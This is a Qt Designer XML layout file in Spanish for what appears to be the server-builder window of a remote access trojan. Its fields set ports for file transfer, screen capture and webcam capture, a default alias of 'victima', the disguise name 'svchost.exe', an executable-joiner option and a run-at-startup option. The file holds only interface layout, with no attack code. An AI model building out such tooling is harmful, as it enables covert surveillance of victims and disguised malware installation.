<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
 <class>ventanaOpciones</class>
 <widget class="QMainWindow" name="ventanaOpciones">
  <property name="geometry">
   <rect>
    <x>0</x>
    <y>0</y>
    <width>367</width>
    <height>572</height>
   </rect>
  </property>
  <property name="windowTitle">
   <string>Configurar y crear un servidor</string>
  </property>
  <widget class="QWidget" name="centralwidget">
   <layout class="QVBoxLayout" name="verticalLayout_4">
    <item>
     <layout class="QHBoxLayout" name="horizontalLayout">
      <item>
       <widget class="QLabel" name="label">
        <property name="text">
         <string>Host:</string>
        </property>
       </widget>
      </item>
      <item>
       <widget class="QLineEdit" name="textoHost">
        <property name="text">
         <string>localhost</string>
        </property>
       </widget>
      </item>
     </layout>
    </item>
    <item>
     <layout class="QHBoxLayout" name="horizontalLayout_2" stretch="0,0">
      <item>
       <widget class="QLabel" name="label_2">
        <property name="sizePolicy">
         <sizepolicy hsizetype="Expanding" vsizetype="Preferred">
          <horstretch>0</horstretch>
          <verstretch>0</verstretch>
         </sizepolicy>
        </property>
        <property name="text">
         <string>Puerto Principal:                                      </string>
        </property>
       </widget>
      </item>
      <item>
       <widget class="QLineEdit" name="textoPuerto">
        <property name="sizePolicy">
         <sizepolicy hsizetype="Expanding" vsizetype="Fixed">
          <horstretch>0</horstretch>
          <verstretch>0</verstretch>
         </sizepolicy>
        </property>
        <property name="text">
         <string>1234</string>
        </property>
       </widget>
      </item>
     </layout>
    </item>
    <item>
     <layout class="QHBoxLayout" name="horizontalLayout_3">
      <item>
       <widget class="QLabel" name="label_3">
        <property name="text">
         <string>Puerto de transferencia de archivos:     </string>
        </property>
       </widget>
      </item>
      <item>
       <widget class="QLineEdit" name="textoPuertoArchivos">
        <property name="text">
         <string>2345</string>
        </property>
       </widget>
      </item>
     </layout>
    </item>
    <item>
     <layout class="QHBoxLayout" name="horizontalLayout_4">
      <item>
       <widget class="QLabel" name="label_4">
        <property name="text">
         <string>Puerto capturas de pantalla:                  </string>
        </property>
       </widget>
      </item>
      <item>
       <widget class="QLineEdit" name="textoPuertoEscritorio">
        <property name="text">
         <string>3456</string>
        </property>
       </widget>
      </item>
     </layout>
    </item>
    <item>
     <layout class="QHBoxLayout" name="horizontalLayout_5">
      <item>
       <widget class="QLabel" name="label_5">
        <property name="text">
         <string>Puerto captura de webcam:                   </string>
        </property>
       </widget>
      </item>
      <item>
       <widget class="QLineEdit" name="textoPuertoWebcam">
        <property name="text">
         <string>4567</string>
        </property>
       </widget>
      </item>
     </layout>
    </item>
    <item>
     <layout class="QHBoxLayout" name="horizontalLayout_6">
      <item>
       <widget class="QLabel" name="label_6">
        <property name="text">
         <string>Tiempo de reintento de conexi√≥n: </string>
        </property>
       </widget>
      </item>
      <item>
       <widget class="QLineEdit" name="textoTiempo">
        <property name="text">
         <string>30000</string>
        </property>
       </widget>
      </item>
      <item>
       <widget class="QLabel" name="label_7">
        <property name="text">
         <string>ms</string>
        </property>
       </widget>
      </item>
     </layout>
    </item>
    <item>
     <layout class="QHBoxLayout" name="horizontalLayout_7">
      <item>
       <widget class="QLabel" name="label_8">
        <property name="text">
         <string>Alias:</string>
        </property>
       </widget>
      </item>
      <item>
       <widget class="QLineEdit" name="textoAlias">
        <property name="text">
         <string>victima</string>
        </property>
       </widget>
      </item>
     </layout>
    </item>
    <item>
     <layout class="QHBoxLayout" name="horizontalLayout_9">
      <item>
       <widget class="QLabel" name="label_10">
        <property name="text">
         <string>Nombre del servidor al inicio</string>
        </property>
       </widget>
      </item>
      <item>
       <widget class="QLineEdit" name="textoNombre">
        <property name="text">
         <string>svchost.exe</string>
        </property>
       </widget>
      </item>
     </layout>
    </item>
    <item>
     <layout class="QVBoxLayout" name="verticalLayout">
      <item>
       <widget class="QCheckBox" name="checkJoiner">
        <property name="text">
         <string>Unir a un ejecutable</string>
        </property>
       </widget>
      </item>
      <item>
       <layout class="QHBoxLayout" name="horizontalLayout_8">
        <item>
         <widget class="QLabel" name="label_9">
          <property name="enabled">
           <bool>false</bool>
          </property>
          <property name="text">
           <string>Ejecutable:</string>
          </property>
         </widget>
        </item>
        <item>
         <widget class="QLineEdit" name="textoEjecutable">
          <property name="enabled">
           <bool>false</bool>
          </property>
         </widget>
        </item>
        <item>
         <widget class="QPushButton" name="botonExaminar">
          <property name="enabled">
           <bool>false</bool>
          </property>
          <property name="text">
           <string>Examinar</string>
          </property>
         </widget>
        </item>
       </layout>
      </item>
     </layout>
    </item>
    <item>
     <layout class="QVBoxLayout" name="verticalLayout_3">
      <item>
       <widget class="QCheckBox" name="checkEjecutar">
        <property name="text">
         <string>Ejecutar un programa al inicio:</string>
        </property>
       </widget>
      </item>
      <item>
       <layout class="QHBoxLayout" name="horizontalLayout_10">
        <item>
         <widget class="QLabel" name="label_11">
          <property name="enabled">
           <bool>false</bool>
          </property>
          <property name="text">
           <string>Programa:</string>
          </property>
         </widget>
        </item>
        <item>
         <widget class="QLineEdit" name="textoEjecutar">
          <property name="enabled">
           <bool>false</bool>
          </property>
         </widget>
        </item>
        <item>
         <widget class="QGroupBox" name="groupOpciones">
          <property name="enabled">
           <bool>false</bool>
          </property>
          <property name="title">
           <string>Opciones</string>
          </property>
          <layout class="QVBoxLayout" name="verticalLayout_2">
           <item>
            <widget class="QRadioButton" name="radioUnaVez">
             <property name="text">
              <string>Una vez</string>
             </property>
             <property name="checked">
              <bool>true</bool>
             </property>
            </widget>
           </item>
           <item>
            <widget class="QRadioButton" name="radioSiempre">
             <property name="text">
              <string>Siempre</string>
             </property>
            </widget>
           </item>
          </layout>
         </widget>
        </item>
       </layout>
      </item>
     </layout>
    </item>
    <item>
     <widget class="QPushButton" name="botonCrearServidor">
      <property name="text">
       <string>Crear servidor</string>
      </property>
     </widget>
    </item>
   </layout>
  </widget>
  <widget class="QMenuBar" name="menubar">
   <property name="geometry">
    <rect>
     <x>0</x>
     <y>0</y>
     <width>367</width>
     <height>21</height>
    </rect>
   </property>
  </widget>
  <widget class="QStatusBar" name="statusbar"/>
 </widget>
 <resources/>
 <connections/>
</ui>
